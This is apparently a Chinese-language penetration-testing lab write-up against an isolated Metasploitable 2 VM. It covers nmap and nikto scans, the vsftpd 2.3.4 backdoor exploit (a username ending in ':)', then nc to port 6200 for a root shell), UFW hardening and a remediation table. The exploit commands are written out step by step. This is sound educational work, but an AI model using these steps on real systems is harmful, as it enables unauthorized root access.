受控的虚拟攻防实验室 — CVE-2011-2523 漏洞利用、Nmap 侦察、Nikto 扫描、UFW 强化,均在 Metasploitable 2 上实现
本实验室在一个完全隔离的虚拟环境中模拟了真实的渗透测试和防御加固练习。它演示了完整的攻击性安全生命周期——从侦察到利用——以及能够缓解每种风险的防御控制措施。
关键成果: 通过利用已知后门,在无需凭据且无特殊工具的情况下,于60秒内获取了目标机器的完全 root 访问权限。
| 组件 | 详情 |
|---|---|
| 虚拟机管理程序 | VMware Workstation |
| 网络 | 仅主机模式 / NAT(完全隔离) |
| 攻击机操作系统 | Ubuntu 24 LTS |
| 目标操作系统 | Metasploitable 2 (Linux 2.6.x) |
| 攻击机 IP | 192.168.148.255 |
| 目标 IP | 192.168.148.130 |
侦查 → 扫描 → 利用 → 防御与加固
sudo nmap -sV -O 192.168.148.130 -oN scan_before.txt
关键发现—共23个开放端口:
nikto -h http://192.168.148.130 -o nikto_before.txt
发现18个漏洞,包括:
phpinfo.php 泄露完整服务器配置/doc/、/test/ 目录索引vsftpd 2.3.4 包含一个由供应链攻陷引入的后门。发送以 :) 结尾的用户名会导致服务器在 6200 端口打开一个 root shell。
# 步骤 1 — 通过 FTP 触发后门
ftp 192.168.148.130
# 用户名: backdoor:) 密码: 任意内容
# 步骤 2 — 连接到生成的 shell
nc 192.168.148.130 6200
# 步骤 3 — 验证访问权限
whoami
# → root
结果: 在 < 60 秒 内获得了完全的 root 级别系统访问权限——无需凭据、无需利用框架。
影响: 拥有 root 权限的攻击者可以读取/修改/删除任何文件、安装恶意软件、窃取数据或横向移动至网络中的其他主机。
sudo ufw enable
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp # 仅允许 SSH
sudo ufw status verbose
请参阅 report.md 获取完整评估——包括完整方法论、命令输出、发现表、利用步骤以及所有修复建议。
本实验室是在完全隔离的虚拟环境中使用故意存在漏洞的软件(Metasploitable 2)进行的。所有技术仅用于教育和作品集展示目的。请勿在你未拥有或未经明确书面许可的系统上复现。
| 工具 |
|---|
| 端口 | 服务 | 版本 | 风险 |
|---|
| 21 | FTP | vsftpd 2.3.4 | 🔴 严重 — 已知后门 (CVE-2011-2523) |
| 22 | SSH | OpenSSH 4.7p1 | 🟡 中 — 版本过旧 |
| 23 | Telnet | Linux telnetd | 🟠 高 — 明文协议 |
| 80 | HTTP | Apache 2.2.8 | 🟠 高 — 多个 CVE |
| 1524 | 绑定 shell | Root shell | 🔴 严重 — 开放的 root shell |
| 3306 | MySQL | 5.0.51a | 🟠 高 — 数据库暴露 |
| 5900 | VNC | 协议 3.3 | 🟠 高 — 弱认证 |
| 6667 | IRC | UnrealIRCd | 🔴 严重 — 已知后门 |
| 漏洞 | 修复 |
|---|
| vsftpd 2.3.4 后门 | 升级至 vsftpd 3.x 或迁移至 SFTP |
| 开放的 root shell(端口 1524) | 立即禁用,审计安装过程 |
| Telnet(端口 23) | 禁用——强制仅使用 SSH |
| phpMyAdmin 暴露 | 按 IP 限制,要求强认证 |
| MySQL 暴露(端口 3306) | 绑定至 localhost,阻止外部访问 |
| VNC 暴露(端口 5900) | 按 IP 限制或禁用 |
| 目录索引 | Apache: Options -Indexes |
| HTTP TRACE | Apache: TraceEnable off |
| 版本过旧的 Apache + PHP | 升级至受支持的 LTS 版本 |
| 用途 |
|---|
| Nmap | 端口扫描和服务检测 |
| Nikto | Web 漏洞扫描 |
| Netcat | 连接后门 shell |
| UFW | 基于主机的防火墙配置 |
| FTP 客户端 | 触发 vsftpd 后门 |
| VMware Workstation | 实验室虚拟化 |